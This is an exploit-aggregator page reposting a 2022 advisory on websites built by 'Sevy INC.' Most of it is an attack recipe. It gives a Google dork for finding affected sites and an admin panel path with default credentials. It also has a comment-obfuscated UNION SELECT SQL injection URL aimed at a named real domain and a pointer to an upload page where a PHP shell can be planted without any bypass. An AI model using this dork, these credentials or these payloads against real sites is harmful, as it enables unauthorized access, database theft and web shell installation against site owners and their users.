Advertisement






Designed By Sevy INC. - SQL Injection Vulnerability, Unrestricted File Upload Vulnerability and Defa

CVE Category Price Severity
Not specified CWE-89, CWE-434 Not specified High
Author Risk Exploitation Type Date
Sevy Inc. High Remote 2022-07-06
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070018

Below is a copy:

Designed By Sevy INC. - SQL Injection Vulnerability, Unrestricted File Upload Vulnerability and Default Admin Credentials
******************************************************************
#Exploit Title: Designed By Sevy INC. - SQL Injection Vulnerability, File Upload Vulnerability and Default Admin Credentials
#Date: 2022-07-06
#Exploit Author: Jayson Cabrillas San Buenaventura
#Google Dork: "Designed By Sevy INC."
#Category: webapps
#Tested On: Parrot Sec, CyberFox
 
 
Proof of Concept:
Search google Dork: "Designed By Sevy INC."


## Admin Panel:

https://site.com/iadmin


## Default Admin Creds:

user: admin
pass: admin

user: emp
pass: emp


### SQLi Demo :

https://adroithrs.com/job-detail.php?id=-66'+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,DATABASE(),5,6,7,8,9,10,11,12,13,14,15,16,17,18--+


### File Upload Demo :

Go to the link below then you can upload your shell / php shell directly without bypass or tamper data.
 

https://adroithrs.com/iadmin/team_master.php?uid=20


****************************************************************** 
#Discovered by: Jayson Cabrillas San Buenaventura
#Facebook: Jayson Cabrillas Cabrillas San Buenaventura
#Email: [email protected]
******************************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.